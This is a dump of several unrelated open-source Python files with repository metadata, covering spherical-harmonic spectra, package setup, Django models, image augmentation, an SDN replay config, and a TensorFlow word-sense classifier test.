        coefficient magnitudes.
    unit : str, optional, default = 'per_l'
        'per_l' gives the total contribution of degree l; 'per_lm' the
        average contribution of one coefficient of degree l (i.e. 'per_l'
        divided by 2l+1); 'per_dlogl' the contribution per logarithmic
        degree interval dlog_a(l), equal to 'per_l' times l*log(a).
    base : float, optional, default = 10.
        Logarithm base for the 'per_dlogl' spectrum.
    """
    if lmax is None:
        lmax = len(clm[0, :, 0]) - 1
    if degrees is None:
        degrees = _np.arange(lmax + 1)

    spec = _np.empty(len(degrees))
    complex_coeffs = _np.iscomplexobj(clm)

    # Start from the l2-norm per degree: the sum of squared magnitudes of
    # every order belonging to degree l.
    for i, l in enumerate(degrees):
        cos_part = clm[0, l, 0:l + 1]
        sin_part = clm[1, l, 1:l + 1]
        if complex_coeffs:
            spec[i] = ((cos_part * cos_part.conjugate()).real.sum() +
                       (sin_part * sin_part.conjugate()).real.sum())
        else:
            spec[i] = (cos_part**2).sum() + (sin_part**2).sum()

    conv = convention.lower()
    if conv in ('power', 'energy'):
        # convert the l2-norm to power for the given normalization
        if normalization == '4pi':
            pass
        elif normalization == 'schmidt':
            spec /= (2.0 * degrees + 1.0)
        elif normalization == 'ortho':
            spec /= (4.0 * _np.pi)
        else:
            raise ValueError(
                "normalization must be '4pi', 'ortho', or 'schmidt'. " +
                "Input value was {:s}".format(repr(normalization)))
    elif conv != 'l2norm':
        raise ValueError(
            "convention must be 'power', 'energy', or 'l2norm'. " +
            "Input value was {:s}".format(repr(convention)))

    if conv == 'energy':
        spec *= 4.0 * _np.pi

    u = unit.lower()
    if u == 'per_l':
        pass
    elif u == 'per_lm':
        spec /= (2.0 * degrees + 1.0)
    elif u == 'per_dlogl':
        spec *= degrees * _np.log(base)
    else:
        raise ValueError(
            "unit must be 'per_l', 'per_lm', or 'per_dlogl'." +
            "Input value was {:s}".format(repr(unit)))
    return spec
| [
"mark.a.wieczorek@gmail.com"
] | mark.a.wieczorek@gmail.com |
967d0339908521e033f2e7ab5123aaae8a304dc1 | 4b8b0be0588f9e5249729f165b72a6b38324837d | /setup.py | fe4f9c413e1a971588bfa6a67604b75d511472a3 | [] | no_license | GlycReSoft2/embed_tandem_ms_classifier | 5e2f569f2b74f2f14f1c1c0cede32de99c150890 | 0495f2234562a9c5dd02d545800c077df2305387 | refs/heads/master | 2020-06-02T09:32:55.457664 | 2015-06-20T21:30:19 | 2015-06-20T21:30:19 | 22,615,207 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,718 | py | import sys
from setuptools import setup, find_packages, Extension
# With gratitude to the SqlAlchemy setup.py authors
from distutils.command.build_ext import build_ext
from distutils.errors import (CCompilerError, DistutilsExecError,
DistutilsPlatformError)
ext_errors = (CCompilerError, DistutilsExecError, DistutilsPlatformError)
if sys.platform == 'win32':
    # 2.6's distutils.msvc9compiler can raise an IOError when failing to
    # find the compiler
    ext_errors += (IOError,)

# Compile from the Cython sources when Cython is available; otherwise fall
# back to the pre-generated C files shipped with the source distribution.
c_ext = "pyx"
try:
    from Cython.Build import cythonize
except Exception:
    # BUG FIX: was a bare "except:", which also swallows SystemExit and
    # KeyboardInterrupt; Exception still covers ImportError and any error
    # raised while importing Cython itself.
    c_ext = "c"
extensions = [
    Extension("glycresoft_ms2_classification.utils.cmass_heap",
              ["glycresoft_ms2_classification/utils/cmass_heap." + c_ext]),
    Extension("glycresoft_ms2_classification.ms.ion_matching",
              ["glycresoft_ms2_classification/ms/ion_matching." + c_ext]),
    Extension("glycresoft_ms2_classification.structure.composition.ccomposition",
              ["glycresoft_ms2_classification/structure/composition/ccomposition." + c_ext])
]
if c_ext == "pyx":
    extensions = cythonize(extensions, annotate=True)
# populated below with the failure-tolerant build_ext command
cmdclass = {}
class BuildFailed(Exception):
    """Signals that compiling an optional C extension failed.

    Captures the exception being handled at construction time so the
    underlying reason can be reported later.
    """
    def __init__(self):
        # sys.exc_info() reads the in-flight exception identically on
        # Python 2 and 3, unlike "except ... as e" scoping.
        self.cause = sys.exc_info()[1]

    def __str__(self):
        return "%s" % (self.cause,)
class ve_build_ext(build_ext):
    # This class allows C extension building to fail.
    def run(self):
        """Run the normal build_ext, converting platform errors to BuildFailed."""
        try:
            build_ext.run(self)
        except DistutilsPlatformError:
            raise BuildFailed()
    def build_extension(self, ext):
        """Build one extension, converting compiler errors to BuildFailed."""
        try:
            build_ext.build_extension(self, ext)
        except ext_errors:
            raise BuildFailed()
        except ValueError:
            # this can happen on Windows 64 bit, see Python issue 7511
            if "'path'" in str(sys.exc_info()[1]): # works with both py 2/3
                raise BuildFailed()
            raise
# register the failure-tolerant command so setup() uses it
cmdclass['build_ext'] = ve_build_ext
def status_msgs(*msgs):
    """Print the given messages framed above and below by a 75-asterisk rule."""
    banner = '*' * 75
    print(banner)
    for message in msgs:
        print(message)
    print(banner)
def run_setup(include_cext=True):
    """Invoke setuptools.setup(); include the C extensions only when asked.

    include_cext=False gives the pure-Python fallback build used when
    compilation fails (see the driver code at the bottom of this file).
    """
    setup(
        name="GlycReSoft",
        version="1.0.2",
        packages=find_packages(),
        install_requires=[
            "scikit-learn >= 0.14.1",
            "pandas >= 0.14.0",
            "pyyaml >= 3.11",
            "pyteomics >= 2.5",
            "sqlitedict >= 1.1.0",
            "numexpr >= 2.1",
            "xray >= 0.3.2"
        ],
        cmdclass=cmdclass,
        zip_safe=False,
        include_package_data=True,
        package_data={
            'glycresoft_ms2_classification': ["*.csv", "*.xml", "*.json", "data/*.csv"],
            'glycresoft_ms2_classification.structure': ["structure/data/*.csv", "structure/data/*.json"]
        },
        ext_modules=extensions if include_cext else None,
        entry_points={
            'console_scripts': [
                "glycresoft-ms2 = glycresoft_ms2_classification.__main__:main",
            ],
            'setuptools.installation': [
                "eggsecutable = glycresoft_ms2_classification.__main__:main"
            ]
        },
        namespace_packages=["glycresoft_ms2_classification"]
    )
# Try a full build first; if the C extensions fail to compile, report the
# problem and retry as a pure-Python installation.
try:
    run_setup(True)
except Exception as exc:
    status_msgs(
        str(exc),
        "WARNING: The C extension could not be compiled, " +
        "speedups are not enabled.",
        "Failure information, if any, is above.",
        "Retrying the build without the C extension now."
    )
    run_setup(False)
    status_msgs(
        "WARNING: The C extension could not be compiled, " +
        "speedups are not enabled.",
        "Plain-Python build succeeded."
    )
| [
"mobiusklein@gmail.com"
] | mobiusklein@gmail.com |
7922391a74fbb335d75565df7e040ef6f5fd5cd2 | 7655e4915fc37c795386252949f4888cb8741510 | /movie_data/models.py | 305dc3ecbfa149f5ff009b3e428035c963dfae5c | [] | no_license | StillsSma/django_movies | 59cf883730ced26172fe1c4ad3dbea87e8d4624d | cf49e429ebf957f5b5068dcdfe6517e47bbfcaba | refs/heads/master | 2021-01-17T16:23:46.585776 | 2016-12-31T17:36:08 | 2016-12-31T17:36:08 | 70,194,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,621 | py | from django.db import models
# Create your models here.
class Movie(models.Model):
    """MovieLens movie: title, release info, IMDb link, one boolean per genre."""
    #movideid = models.IntegerField(primary_key=True)
    movie_title = models.CharField(max_length=100)
    release_date = models.CharField(max_length=11)
    videorelease_date = models.CharField(max_length=10)
    IMDbURL = models.CharField(max_length=150)
    # genre flags, one per MovieLens genre column
    unknown = models.BooleanField()
    action = models.BooleanField()
    adventure = models.BooleanField()
    animation = models.BooleanField()
    children = models.BooleanField()
    comedy = models.BooleanField()
    crime = models.BooleanField()
    documentary = models.BooleanField()
    drama = models.BooleanField()
    fantasy = models.BooleanField()
    film_noir = models.BooleanField()
    horror = models.BooleanField()
    musical = models.BooleanField()
    mystery = models.BooleanField()
    romance = models.BooleanField()
    sciFi = models.BooleanField()
    thriller = models.BooleanField()
    war = models.BooleanField()
    western = models.BooleanField()
    def __str__(self):
        return self.movie_title
class Rater(models.Model):
    """A person who rates movies (MovieLens user demographics)."""
    #raterid = models.IntegerField(primary_key=True)
    age = models.IntegerField()
    gender = models.CharField(max_length=1)
    occupation = models.CharField(max_length=20)
    zipcode = models.CharField(max_length=10)
    def __str__(self):
        # BUG FIX: __str__ must return a str; self.id (the auto primary key)
        # is an int, which raised TypeError whenever the object was printed.
        return str(self.id)
class Rating(models.Model):
    """A single rating given by a Rater to a Movie."""
    rater = models.ForeignKey(Rater)
    movie = models.ForeignKey(Movie)
    rating = models.IntegerField()
    timestmp = models.IntegerField()
    def __str__(self):
        # BUG FIX: the original returned the tuple (self.movie, self.rating),
        # but __str__ must return a str, so printing raised TypeError.
        return "{}: {}".format(self.movie, self.rating)
| [
"samdawson301@live.com"
] | samdawson301@live.com |
ac2b903968d57e5a20ad2475bdd901522ae13bf0 | abc24a58da46f02551e09b229087420f70b37ddf | /att/upeek/upeek/augment.py | a99891e2ef13c34d68eca5bc4cb9817cad4c0974 | [] | no_license | erikperillo/att | bfd7198a0ea3687e1fac952e2aa6510911b8db19 | 4b02fefc40c4dfde2549857272ad943bff168a7e | refs/heads/master | 2020-07-03T19:36:47.195578 | 2018-07-18T14:30:02 | 2018-07-18T14:30:02 | 67,546,898 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,037 | py | """
The MIT License (MIT)
Copyright (c) 2017 Erik Perillo <erik.perillo@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
IN THE SOFTWARE.
"""
"""
Module for data augmentation.
"""
from skimage import io
from skimage import transform as skt
from skimage import filters as skf
import numpy as np
def _get_rng(rng):
if not isinstance(rng, (list, tuple)):
rng = (rng, rng)
return rng
def _rot90(arr, reps=1):
"""
Performs 90 degrees rotation 'reps' times.
Assumes image with shape ([n_samples, n_channels,] height, width).
"""
for __ in range(reps%4):
arr = arr.swapaxes(-2, -1)[..., ::-1]
return arr
def rot90(x, y, reps=1):
    """Rotate x (and y too, unless y is None) by 90 degrees, reps times."""
    if y is not None:
        y = _rot90(y, reps)
    return _rot90(x, reps), y
def _hmirr(img):
"""
Flips image horizontally.
Assumes image with shape ([n_samples, n_channels,] height, width).
"""
return img[..., ::-1]
def hmirr(x, y):
    """Horizontally mirror x (and y too, unless y is None)."""
    if y is not None:
        y = _hmirr(y)
    return _hmirr(x), y
def some_of(x, y=None, ops=[]):
    """
    Pick one operation uniformly at random from ops and apply it to x
    (and to y as well, when y is not None).
    """
    chosen = np.random.choice(ops)
    out_x = chosen(x)
    out_y = chosen(y) if y is not None else y
    return out_x, out_y
def _rotation(img, angle, **kwargs):
    """
    Rotates image in degrees in counter-clockwise direction.
    Assumes image in [0, 1] with shape ([n_samples, n_channels,] height, width).
    """
    # channels-first -> channels-last for skimage, rotate, then swap back
    img = img.swapaxes(0, 1).swapaxes(1, 2)
    img = skt.rotate(img, angle=angle, resize=False, mode="constant",
        preserve_range=True, **kwargs).astype(img.dtype)
    img = img.swapaxes(2, 1).swapaxes(1, 0)
    return img
def rotation(x, y, rng, **kwargs):
    """Rotate x (and y, if given) by a single angle drawn uniformly from rng."""
    angle = np.random.uniform(*rng)
    x = _rotation(x, angle, **kwargs)
    y = y if y is None else _rotation(y, angle, **kwargs)
    return x, y
def _shear(img, shear):
    """
    Shears image.
    Assumes image in [0, 1] with shape ([n_samples, n_channels,] height, width).
    """
    at = skt.AffineTransform(shear=shear)
    # channels-first -> channels-last for skimage, warp, then swap back
    img = img.swapaxes(0, 1).swapaxes(1, 2)
    img = skt.warp(img, at)
    img = img.swapaxes(2, 1).swapaxes(1, 0)
    return img
def shear(x, y, rng, **kwargs):
    """Shear x (and y, if given) by a single factor drawn uniformly from rng."""
    shear = np.random.uniform(*rng)
    x, y = _shear(x, shear), y if y is None else _shear(y, shear)
    return x, y
def _translation(img, transl):
    """
    Performs shift in image in dx, dy = transl.
    Assumes image in [0, 1] with shape ([n_samples, n_channels,] height, width).
    """
    at = skt.AffineTransform(translation=transl)
    # channels-first -> channels-last for skimage, warp, then swap back
    img = img.swapaxes(0, 1).swapaxes(1, 2)
    img = skt.warp(img, at)
    img = img.swapaxes(2, 1).swapaxes(1, 0)
    return img
def translation(x, y, rng):
    """Shift x (and y, if given) by random fractions of its width and height."""
    h, w = x.shape[-2:]
    # rng values are fractions of the image size; convert to whole pixels
    transl = (int(np.random.uniform(*rng)*w), int(np.random.uniform(*rng)*h))
    x, y = _translation(x, transl), y if y is None else _translation(y, transl)
    return x, y
def _add_noise(img, noise):
"""
Adds noise to image.
Assumes image in [0, 1].
"""
img = img + noise
return img
def add_noise(x, y, rng):
    """Add elementwise uniform noise drawn from rng to x; y passes through."""
    noise = np.random.uniform(*rng, size=x.shape).astype("float32")
    return _add_noise(x, noise), y
def _mul_noise(img, noise):
"""
Multiplies image by a factor.
Assumes image in [0, 1].
"""
img = img*noise
return img
def mul_noise(x, y, rng):
    """Multiply x by one factor drawn uniformly from rng; y passes through."""
    factor = np.random.uniform(*rng)
    return _mul_noise(x, factor), y
def _blur(img, sigma):
    """
    Applies gaussian blur to image.
    Assumes image in [0, 1] with shape ([n_samples, n_channels,] height, width).
    """
    img = img.swapaxes(0, 1).swapaxes(1, 2)
    # blur each channel independently
    for i in range(img.shape[-1]):
        img[..., i] = skf.gaussian(img[..., i], sigma=sigma)
    # NOTE(review): swapaxes returns a view, so the assignments above write
    # through to the caller's array (in-place blur) -- confirm intended.
    img = img.swapaxes(2, 1).swapaxes(1, 0)
    return img
def blur(x, y, rng=0.5):
    """Gaussian-blur x with a sigma drawn uniformly from rng; y passes through.

    rng may be a (low, high) pair or a single scalar sigma.
    """
    # BUG FIX: the default rng=0.5 is a scalar, and np.random.uniform(*rng)
    # cannot unpack it (TypeError); _get_rng turns a scalar v into (v, v),
    # while leaving tuple/list ranges unchanged.
    sigma = np.random.uniform(*_get_rng(rng))
    x, y = _blur(x, sigma), y
    return x, y
def identity(x, y):
    """No-op augmentation: return the sample unchanged."""
    return x, y
def _unit_norm(img, minn, maxx, dtype="float32"):
img = ((img - minn)/max(maxx - minn, 1)).astype(dtype)
return img
def _unit_denorm(img, minn, maxx, dtype="float32"):
img = (img*(maxx - minn) + minn).astype(dtype)
return img
#mapping of strings to methods
# Used by augment() to resolve operation names appearing in op_seqs specs.
OPS_MAP = {
    "rot90": rot90,
    "rotation": rotation,
    "shear": shear,
    "translation": translation,
    "add_noise": add_noise,
    "mul_noise": mul_noise,
    "blur": blur,
    "identity": identity,
    "hmirr": hmirr,
}
def augment(xy, op_seqs, apply_on_y=False, add_iff_op=True):
    """
    Performs data augmentation on x, y sample.
    op_seqs is a list of sequences of operations.
    Each sequence must be in format (op_name, op_prob, op_kwargs).
    Example of valid op_seqs:
        [
            [
                ('identity', 1.0, {}),
            ],
            [
                ('hmirr', 1.0, {}),
                ('rot90', 1.0, {'reps': 3})
            ],
            [
                ('rotation', 0.5, {'rng': (-10, 10)}),
            ]
        ]
    ('identity' is necessary to keep the original image in the returned list.)
    add_iff_op: adds image to augm list only if some operation happened.
    """
    #list of augmented images
    augm = []
    #pre-processing x, y for augmentation
    # Remember the original value range/dtype so results can be mapped back.
    x, y = xy
    x_minn, x_maxx, x_dtype = x.min(), x.max(), x.dtype
    x = _unit_norm(x, x_minn, x_maxx, "float32")
    if apply_on_y:
        y_minn, y_maxx, y_dtype = y.min(), y.max(), y.dtype
        y = _unit_norm(y, y_minn, y_maxx, "float32")
    #applying sequences
    for op_seq in op_seqs:
        # Work on copies so every sequence starts from the pristine sample.
        _x, _y = x.copy(), y.copy() if apply_on_y else None
        some_op = False
        #applying sequence of operations
        for name, prob, kwargs in op_seq:
            op = OPS_MAP[name]
            # Each op fires independently with probability `prob`.
            if np.random.uniform(0.0, 1.0) <= prob:
                some_op = True
                _x, _y = op(_x, _y, **kwargs)
        #adding sample to augm list
        if some_op or not add_iff_op:
            # Map the augmented sample back to the original range/dtype.
            _x = _unit_denorm(_x, x_minn, x_maxx, x_dtype)
            if apply_on_y:
                _y = _unit_denorm(_y, y_minn, y_maxx, y_dtype)
            augm.append((_x, _y if apply_on_y else y))
    return augm
| [
"erik.perillo@gmail.com"
] | erik.perillo@gmail.com |
c97351ef49dfe8735e8b6a5599c8b563241932cd | 077c91b9d5cb1a6a724da47067483c622ce64be6 | /syn_mem_corruption_3switch_fuzzer_mcs/intermcs_7_/interactive_replay_config.py | f85bde175e0795cebfea56199299bdfee1f657fc | [] | no_license | Spencerx/experiments | 0edd16398725f6fd9365ddbb1b773942e4878369 | aaa98b0f67b0d0c0c826b8a1565916bf97ae3179 | refs/heads/master | 2020-04-03T10:11:40.671606 | 2014-06-11T23:55:11 | 2014-06-11T23:55:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,022 | py |
from config.experiment_config_lib import ControllerConfig
from sts.topology import *
from sts.control_flow import InteractiveReplayer
from sts.simulation_state import SimulationConfig
from sts.input_traces.input_logger import InputLogger
# STS interactive-replay configuration: one POX controller running the
# l2_multi_syn_mem_corruption forwarding module on a 4-switch mesh,
# replaying a previously minimized fuzzer trace (mcs.trace.notimeouts).
simulation_config = SimulationConfig(controller_configs=[ControllerConfig(start_cmd='./pox.py --verbose openflow.of_01 --address=__address__ --port=__port__ openflow.discovery forwarding.l2_multi_syn_mem_corruption', label='c1', address='127.0.0.1', cwd='pox')],
                     topology_class=MeshTopology,
                     topology_params="num_switches=4",
                     patch_panel_class=BufferedPatchPanel,
                     multiplex_sockets=False,
                     kill_controllers_on_exit=True)
control_flow = InteractiveReplayer(simulation_config, "experiments/syn_mem_corruption_3switch_fuzzer_mcs/intermcs_7_/mcs.trace.notimeouts")
# wait_on_deterministic_values=False
# delay_flow_mods=False
# Invariant check: 'InvariantChecker.check_liveness'
# Bug signature: "c1"
| [
"b-github.com@wundsam.net"
] | b-github.com@wundsam.net |
e1147a359018bf44948d2604c26fc6f0e527ea4f | cba46e28e6f60d9bd8cc8c24a3ff8e065e5a8e49 | /scrap_trade_proj/customers/migrations/0019_auto_20191031_1014.py | a3e1ab6db2b7d3beb3329c5de1c8a7ede469ddaa | [] | no_license | Horac-Bouthon/scrap-trade-4 | fb7e9f8f9ec41446318ce03ad5ff7024ad795771 | 7686703ce5783dd4a48dc1d9600cda01aa554faa | refs/heads/master | 2022-12-12T21:52:38.209500 | 2020-03-17T07:50:30 | 2020-03-17T07:50:30 | 227,142,003 | 0 | 0 | null | 2022-11-22T04:39:35 | 2019-12-10T14:33:20 | Python | UTF-8 | Python | false | false | 1,185 | py | # Generated by Django 2.2.6 on 2019-10-31 10:14
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django (see file header).  Drops the plain
    # customer_description field and replaces it with a per-language
    # CustomerTranslation model.  Applied migrations must keep their
    # historical behavior, so edit only with a follow-up migration.

    dependencies = [
        ('customers', '0018_auto_20191031_0930'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='customer',
            name='customer_description',
        ),
        migrations.CreateModel(
            name='CustomerTranslation',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('language', models.CharField(choices=[('en', 'English'), ('de', 'German'), ('cs', 'Czech')], max_length=15, verbose_name='language')),
                ('customer_description', models.TextField(blank=True, help_text='Short text to discribe the Customer.', null=True, verbose_name='Customer description')),
                ('model', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='translations', to='customers.Customer', verbose_name='customer')),
            ],
            options={
                'abstract': False,
            },
        ),
    ]
| [
"tbrown.wolf@ubk.cz"
] | tbrown.wolf@ubk.cz |
41bae6481bf4d06f0950f00aeb2ce5087d1eb34d | 5c8139f1e57e06c7eaf603bd8fe74d9f22620513 | /PartC/py字符串的全排列.py | 05bb54b8b4bcd922bdbe01c4e98fa05bea5670c4 | [] | no_license | madeibao/PythonAlgorithm | c8a11d298617d1abb12a72461665583c6a44f9d2 | b4c8a75e724a674812b8a38c0202485776445d89 | refs/heads/master | 2023-04-03T07:18:49.842063 | 2021-04-11T12:02:40 | 2021-04-11T12:02:40 | 325,269,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 212 | py |
from itertools import permutations
# Read a word and print all its permutations in lexicographic order.
string = list(input())
string.sort()
for item in permutations(string):
    item = ''.join(item)
    print(item)
print('')
# Bug fix: the sample output below used to sit in the file as bare
# identifiers (abc, acb, ...), which raised NameError at runtime; it is
# now commented out.  Example for input "abc":
# abc
# acb
# bac
# bca
# cab
# cba
| [
"2901429479@qq.com"
] | 2901429479@qq.com |
d95bc3af87a938f03bfa83472e86030ed654c535 | 628ab6e412e7c4c755bc42d8137acd3da2d4be0e | /apysc/display/line_cap_interface.py | bf9828ca64f0eef0a21e9688109051205fdc76d5 | [
"MIT",
"CC-BY-4.0"
] | permissive | TrendingTechnology/apysc | ffd7d9b558707b934c5df127eca817d4f12d619b | 5c6a4674e2e9684cb2cb1325dc9b070879d4d355 | refs/heads/main | 2023-06-01T20:19:20.835539 | 2021-06-20T03:53:33 | 2021-06-20T03:53:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,734 | py | """Class implementation for line cap interface.
"""
from typing import Any
from typing import Dict
from typing import Union
from apysc import String
from apysc.display.line_caps import LineCaps
from apysc.type.revert_interface import RevertInterface
from apysc.type.variable_name_interface import VariableNameInterface
class LineCapInterface(VariableNameInterface, RevertInterface):
    """Mixin that adds a line-cap style property to a display object.

    Reading/writing ``line_cap`` keeps an apysc ``String`` in sync and
    appends the matching JavaScript attribute-update expression to the
    expression file.
    """

    # Current line-cap value; lazily created on first access.
    _line_cap: String

    def _initialize_line_cap_if_not_initialized(self) -> None:
        """
        Initialize the _line_cap attribute (to the BUTT default)
        if it is not initialized yet.
        """
        if hasattr(self, '_line_cap'):
            return
        self._line_cap = String(LineCaps.BUTT.value)

    @property
    def line_cap(self) -> Any:
        """
        Get this instance's line cap style setting.

        Returns
        -------
        line_cap : String
            Line cap style setting (a copy, so callers cannot mutate
            the internal value).
        """
        self._initialize_line_cap_if_not_initialized()
        return self._line_cap._copy()

    @line_cap.setter
    def line_cap(self, value: Any) -> None:
        """
        Set line cap style setting and append the corresponding
        JavaScript update expression.

        Parameters
        ----------
        value : String or LineCaps
            Line cap style setting to set.
        """
        self._update_line_cap_and_skip_appending_exp(value=value)
        self._append_line_cap_update_expression()

    def _append_line_cap_update_expression(self) -> None:
        """
        Append line cap updating expression to file.
        """
        # Imported locally, matching the pattern used elsewhere in apysc
        # (presumably to avoid circular imports - confirm).
        from apysc.expression import expression_file_util
        from apysc.type import value_util
        cap_name: str = value_util.get_value_str_for_expression(
            value=self._line_cap)
        expression: str = (
            f'{self.variable_name}.attr({{"stroke-linecap": {cap_name}}});'
        )
        expression_file_util.append_js_expression(expression=expression)

    def _update_line_cap_and_skip_appending_exp(
            self, value: Union[String, LineCaps]) -> None:
        """
        Update line cap value without appending an expression to file.

        Parameters
        ----------
        value : String or LineCaps
            Line cap style setting to set.

        Raises
        ------
        TypeError
            If value is neither a String nor a LineCaps member.
        """
        from apysc.validation.display_validation import validate_line_cap
        if not isinstance(value, (String, LineCaps)):
            raise TypeError(
                'Not supported line_cap type specified: '
                f'{type(value)}'
                '\nAcceptable ones are: String or LineCaps.')
        validate_line_cap(cap=value)
        # Copy a String argument so later caller-side mutation cannot
        # change this instance; unwrap a LineCaps enum to its value.
        if isinstance(value, String):
            self._line_cap = value._copy()
        else:
            self._line_cap = String(value.value)

    # Snapshot-name -> raw line-cap value, used by the revert interface.
    _line_cap_snapshots: Dict[str, str]

    def _make_snapshot(self, snapshot_name: str) -> None:
        """
        Make value's snapshot.

        Parameters
        ----------
        snapshot_name : str
            Target snapshot name.
        """
        if not hasattr(self, '_line_cap_snapshots'):
            self._line_cap_snapshots = {}
        if self._snapshot_exists(snapshot_name=snapshot_name):
            return
        self._initialize_line_cap_if_not_initialized()
        self._line_cap_snapshots[snapshot_name] = self._line_cap._value

    def _revert(self, snapshot_name: str) -> None:
        """
        Revert value if snapshot exists.

        Parameters
        ----------
        snapshot_name : str
            Target snapshot name.
        """
        if not self._snapshot_exists(snapshot_name=snapshot_name):
            return
        self._line_cap._value = self._line_cap_snapshots[snapshot_name]
| [
"antisocial.sid2@gmail.com"
] | antisocial.sid2@gmail.com |
db5504e104deb39722576dde7ff2496054907854 | 9827269c84a2afc599a8ac8ac88027b25ef74d78 | /02_51409_wsd_test.py | bbf880931362d50fdacd70498414a064641df60d | [] | no_license | caonlp/wsd_bert_tensorflow_version | 2dbb7883d8a1bc5cedbe0d69a04a8cdda3ce757f | 7cf786d1803ac6e49292469b1afdf71838295b25 | refs/heads/main | 2023-03-13T22:45:26.361832 | 2021-03-04T06:35:06 | 2021-03-04T06:35:06 | 344,372,725 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,310 | py | import tensorflow as tf
import numpy as np
import codecs
from keras.utils import to_categorical
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
def load_wsd_train_x():
    """Load the BERT feature vectors for the training sentences.

    Each line of '51409_train_data' is whitespace-separated; the first
    three tokens are metadata and the remainder are feature values
    (kept as strings, as in the original).

    Fix: the original opened the file and never closed it - its
    ``close()`` call sat after ``return`` and was unreachable.  A
    ``with`` block now releases the handle deterministically.
    """
    rows = []
    with codecs.open('51409_train_data', mode='r', encoding='utf-8') as f:
        for line in f:
            tokens = line.split()
            rows.append(tokens[3:])
    return np.array(rows)
def load_wsd_test_x():
    """Load the BERT feature vectors for the test sentences.

    Each line of '51409_test_data' is whitespace-separated; the first
    three tokens are metadata and the remainder are feature values.

    Fix: the original leaked the file handle (``close()`` was placed
    after ``return`` and never ran); a ``with`` block now closes it.
    """
    rows = []
    with codecs.open('51409_test_data', mode='r', encoding='utf-8') as f:
        for line in f:
            tokens = line.split()
            rows.append(tokens[3:])
    return np.array(rows)
def load_wsd_train_y():
    """Load the 50 gold sense labels for the training sentences.

    Each line of '51409_train_target' is whitespace-separated and its
    second token is the sense id; exactly 50 lines are expected (the
    reshape enforces this).

    Fix: the original leaked the file handle (``close()`` was placed
    after ``return`` and never ran); a ``with`` block now closes it.
    """
    labels = []
    with codecs.open('51409_train_target', mode='r', encoding='utf-8') as f:
        for line in f:
            tokens = line.split()
            labels.append(tokens[1:2])
    return (np.array(labels)).reshape(50,)
def load_wsd_test_y():
    """Load the 50 gold sense labels for the test sentences.

    Each line of '51409_test_target' is whitespace-separated and its
    second token is the sense id; exactly 50 lines are expected.

    Fix: the original leaked the file handle (``close()`` was placed
    after ``return`` and never ran); a ``with`` block now closes it.
    """
    labels = []
    with codecs.open('51409_test_target', mode='r', encoding='utf-8') as f:
        for line in f:
            tokens = line.split()
            labels.append(tokens[1:2])
    return (np.array(labels)).reshape(50,)
# Padding column appended to the one-hot training targets so their width
# matches the 5-way softmax output built below.
b = np.zeros(50)

# Load BERT features and gold sense labels for target word 51409.
wsd_train_x = load_wsd_train_x()
wsd_test_x = load_wsd_test_x()
wsd_train_y = load_wsd_train_y()
wsd_train_y = to_categorical(wsd_train_y)
wsd_train_y = np.c_[wsd_train_y, b]
wsd_test_y = load_wsd_test_y()
wsd_test_y = to_categorical(wsd_test_y)
#wsd_test_y = np.c_[wsd_test_y, b]

max_epoch = 100
train_size = wsd_train_x.shape[0]
batch_size = 10
n_batch = train_size // batch_size
layer_num = 2  # 2 = plain softmax regression, 3 = one hidden sigmoid layer
gogi_num = 5   # number of candidate senses for this target word

if layer_num == 3:
    x = tf.placeholder(tf.float32, [None, 768])
    y = tf.placeholder(tf.float32, [None, gogi_num])
    W1 = tf.Variable(tf.zeros([768, 50]))
    b1 = tf.Variable(tf.zeros([50]))
    L1 = tf.nn.sigmoid(tf.matmul(x, W1) + b1)
    W2 = tf.Variable(tf.zeros([50, gogi_num]))
    # Bug fix: this was ``tf.zeros[gogi_num]`` (indexing the function,
    # a TypeError whenever layer_num == 3); the shape must be an argument.
    b2 = tf.Variable(tf.zeros([gogi_num]))
    predict = tf.nn.softmax(tf.matmul(L1, W2) + b2)
if layer_num == 2:
    x = tf.placeholder(tf.float32, [None, 768])
    y = tf.placeholder(tf.float32, [None, gogi_num])
    W = tf.Variable(tf.zeros([768, gogi_num]))
    b = tf.Variable(tf.zeros([gogi_num]))
    predict = tf.nn.softmax(tf.matmul(x, W) + b)

loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=y, logits=predict))
train_step = tf.train.AdamOptimizer().minimize(loss)
init = tf.global_variables_initializer()
correct_predict = tf.equal(tf.argmax(y, 1), tf.argmax(predict, 1))
accuracy = tf.reduce_mean(tf.cast(correct_predict, tf.float32))
saver = tf.train.Saver()

with tf.Session() as sess:
    sess.run(init)
    # Restore previously trained weights and report test accuracy only.
    saver.restore(sess, 'model/51409_wsd_model.ckpt')
    print("51409(normal) : " + str(sess.run(accuracy, feed_dict={x:wsd_test_x, y:wsd_test_y})))
| [
"noreply@github.com"
] | caonlp.noreply@github.com |
